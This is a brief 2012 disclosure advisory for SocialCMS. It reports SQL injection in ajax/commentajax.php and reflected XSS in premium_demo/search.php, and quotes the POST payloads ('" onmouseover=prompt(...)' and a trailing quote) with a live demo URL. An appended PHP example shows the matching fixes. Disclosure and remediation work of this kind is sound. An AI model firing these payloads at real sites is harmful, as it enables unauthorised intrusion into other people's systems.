# Exploit Title: SocialCMS SQL Injection and XSS Vulnerability
# Date: 2012
# Author: Eyup CELIK
# Version: All versions
# Tested on: All versions are vulnerable
# Web Site: www.eyupcelik.com.tr

ISSUE

SQL Injection and XSS can be done using the POST method.

Vulnerable Pages:
ajax/commentajax.php (SQL Injection)
premium_demo/search.php (XSS)

Example:
URL encoded POST input TREF_email_address was set to " onmouseover=prompt(908768) bad="
and URL encoded POST input TR_name was set to " onmouseover=prompt(910836) bad="
URL encoded POST input category was set to 1'

POC:
http://socialcms.com/premium_demo/

Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr
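
Added example, not part of the original advisory and not SocialCMS code: how the two input classes quoted above are neutralised, with attribute-context encoding for the reflected form values and integer validation plus a bound parameter for category. The function names (attr, category_id, comments_for), the comments table and the in-memory SQLite database are hypothetical stand-ins.

```php
<?php
// Added illustration: NOT SocialCMS source. Table, column and function names are hypothetical.

// Attribute-context output: encode both quote styles so a value cannot close
// the attribute and append an event handler such as onmouseover.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Numeric parameter: accept only a positive integer, reject anything else.
function category_id(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Bound parameter: the value travels as data and is never concatenated into SQL.
function comments_for(PDO $db, int $categoryId): array
{
    $stmt = $db->prepare('SELECT body FROM comments WHERE category_id = :id');
    $stmt->bindValue(':id', $categoryId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed sample input, modelled on the POST values quoted in the advisory.
$post = [
    'TR_name'  => '" onmouseover=prompt(910836) bad="',
    'category' => "1'",
];

// In-memory SQLite stands in for the application's database (assumption).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE comments (category_id INTEGER, body TEXT)');
$db->exec("INSERT INTO comments VALUES (1, 'first comment')");

// The quotes are emitted as entities, so the value stays inside value="...".
echo '<input name="TR_name" value="' . attr($post['TR_name']) . '">', PHP_EOL;

// The trailing quote fails integer validation before any query is built.
$id = category_id($post['category']);
if ($id === null) {
    echo 'category rejected: not a positive integer', PHP_EOL;
} else {
    print_r(comments_for($db, $id));
}
```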